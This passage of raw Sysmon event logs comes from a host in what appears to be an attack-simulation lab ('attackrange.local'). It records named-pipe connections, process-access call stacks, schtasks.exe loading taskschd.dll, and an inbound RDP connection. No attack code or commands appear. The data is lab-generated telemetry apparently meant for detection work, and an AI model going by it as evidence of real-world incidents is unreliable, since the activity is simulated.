(rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=A0180EEE2521DC7847458E0BDC673DBD,SHA256=987A1EA9876E266B68CBB962BECF4BDD8794765DED0ED15B55490A30ED00DD2B,IMPHASH=2C7BF5CADC559377391AFDF385763E3CtrueMicrosoft WindowsValid 18141800x800000000000000077193Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.592{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077192Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.592{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077191Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.592{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077190Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.592{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077189Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.592{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077188Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.592{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077187Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.592{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077186Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.592{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077185Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.592{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 10341000x800000000000000077184Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:02.576{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBFA-607E-FF0D-00000000BB01}1836C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000077183Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:02.561{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBFA-607E-FF0D-00000000BB01}1836C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000077182Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:02.561{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBFA-607E-FF0D-00000000BB01}1836C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 18141800x800000000000000077181Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.561{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077180Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.545{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\FTA_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077179Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.545{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077178Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.545{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 10341000x800000000000000077177Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:02.514{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBFA-607E-FE0D-00000000BB01}3932C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000077176Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:02.498{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBFA-607E-FE0D-00000000BB01}3932C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000077175Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:02.498{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBFA-607E-FE0D-00000000BB01}3932C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 354300x800000000000000077174Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:00.764{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-59837-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 10341000x800000000000000077173Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:02.451{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBFA-607E-FD0D-00000000BB01}2076C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000077172Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:02.436{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBFA-607E-FD0D-00000000BB01}2076C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000077171Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:02.436{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBFA-607E-FD0D-00000000BB01}2076C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 18141800x800000000000000077170Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.420{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 10341000x800000000000000077169Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:02.389{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBFA-607E-FC0D-00000000BB01}1436C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000077168Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:02.373{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBFA-607E-FC0D-00000000BB01}1436C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000077167Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:02.373{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBFA-607E-FC0D-00000000BB01}1436C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 734700x800000000000000077166Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:01.529{A7A01FEF-EBF9-607E-E60D-00000000BB01}3008C:\Windows\System32\schtasks.exeC:\Windows\System32\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=A0180EEE2521DC7847458E0BDC673DBD,SHA256=987A1EA9876E266B68CBB962BECF4BDD8794765DED0ED15B55490A30ED00DD2B,IMPHASH=2C7BF5CADC559377391AFDF385763E3CtrueMicrosoft WindowsValid 734700x800000000000000077165Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:01.686{A7A01FEF-EBF9-607E-EA0D-00000000BB01}6220C:\Windows\System32\schtasks.exeC:\Windows\System32\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=A0180EEE2521DC7847458E0BDC673DBD,SHA256=987A1EA9876E266B68CBB962BECF4BDD8794765DED0ED15B55490A30ED00DD2B,IMPHASH=2C7BF5CADC559377391AFDF385763E3CtrueMicrosoft WindowsValid 734700x800000000000000077164Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:01.717{A7A01FEF-EBF9-607E-EC0D-00000000BB01}4532C:\Windows\System32\schtasks.exeC:\Windows\System32\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=A0180EEE2521DC7847458E0BDC673DBD,SHA256=987A1EA9876E266B68CBB962BECF4BDD8794765DED0ED15B55490A30ED00DD2B,IMPHASH=2C7BF5CADC559377391AFDF385763E3CtrueMicrosoft WindowsValid 734700x800000000000000077163Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:01.764{A7A01FEF-EBF9-607E-EF0D-00000000BB01}4028C:\Windows\System32\schtasks.exeC:\Windows\System32\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=A0180EEE2521DC7847458E0BDC673DBD,SHA256=987A1EA9876E266B68CBB962BECF4BDD8794765DED0ED15B55490A30ED00DD2B,IMPHASH=2C7BF5CADC559377391AFDF385763E3CtrueMicrosoft WindowsValid 18141800x800000000000000077162Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.342{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077161Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.342{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077160Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.326{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077159Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.326{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077158Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.326{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077157Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.326{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077156Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.326{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077155Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.326{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077154Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.326{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077153Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.326{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077152Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.326{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 10341000x800000000000000077151Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:02.311{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBFA-607E-FB0D-00000000BB01}3960C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000077150Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:02.295{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBFA-607E-FB0D-00000000BB01}3960C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000077149Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:02.295{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBFA-607E-FB0D-00000000BB01}3960C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\msc